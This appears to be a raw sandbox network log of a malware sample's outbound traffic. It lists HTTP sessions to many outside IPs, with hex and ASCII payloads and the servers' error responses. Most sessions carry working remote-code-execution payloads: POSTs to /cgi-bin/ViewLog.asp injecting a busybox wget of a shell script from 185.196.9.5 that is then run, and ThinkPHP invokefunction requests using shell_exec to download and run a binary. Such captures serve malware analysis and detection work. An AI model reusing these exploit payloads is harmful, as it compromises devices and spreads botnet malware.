Feb 25, 2024 19:04:13.193792105 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:50 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
551	192.168.2.15	54296	94.199.179.123	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.106323957 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
552	192.168.2.15	39702	94.120.234.26	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.137180090 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
553	192.168.2.15	60520	31.200.62.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.138313055 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
554	192.168.2.15	38746	94.120.174.143	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.140491009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
555	192.168.2.15	53552	85.50.11.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.756696939 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:54.853957891 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
556	192.168.2.15	53928	85.195.23.230	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.756772995 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:52.773688078 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
557	192.168.2.15	48694	94.139.210.15	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.758944035 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:51.968858004 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
558	192.168.2.15	44150	62.29.121.168	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.788958073 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
559	192.168.2.15	51816	88.99.97.174	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:51.877428055 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.062014103 CET	323	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:51 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
560	192.168.2.15	60664	112.137.169.213	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.044409990 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.370955944 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:52 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
561	192.168.2.15	32996	88.99.235.78	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.061902046 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.246195078 CET	292	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
562	192.168.2.15	44180	112.47.14.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.067603111 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.427449942 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:52 GMT Content-Type: text/html Content-Length: 2829 Connection: close x-ws-request-id: 65db8108_PS-JJN-01IWV208_6040-37653 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 32 35 20 46 65 62 20 32 30 32 34 20 31 38 3a 30 33 3a 35 32 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 4a 4a 4e 2d 30 31 49 57 56 32 30 38 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 25 Feb 2024 18:03:52 GMT<br><span class="F">IP: 89.149.18.20</span>Node information: PS-JJN-01IWV208<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins
Feb 25, 2024 19:03:52.427468061 CET	1286	IN	Data Raw: 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 Data Ascii: /x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65db8108_PS-JJN-01IWV208_6040-37653<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class
Feb 25, 2024 19:03:52.427486897 CET	457	IN	Data Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f
Feb 25, 2024 19:03:52.535521984 CET	457	IN	Data Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f
Feb 25, 2024 19:03:52.755846977 CET	457	IN	Data Raw: 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">f

Session ID	Source IP	Source Port	Destination IP	Destination Port
563	192.168.2.15	44182	112.47.14.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:52.118019104 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:52.518301010 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:52 GMT Content-Type: text/html Content-Length: 2828 Connection: close x-ws-request-id: 65db8108_PS-JJN-01IWV208_5755-2230 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 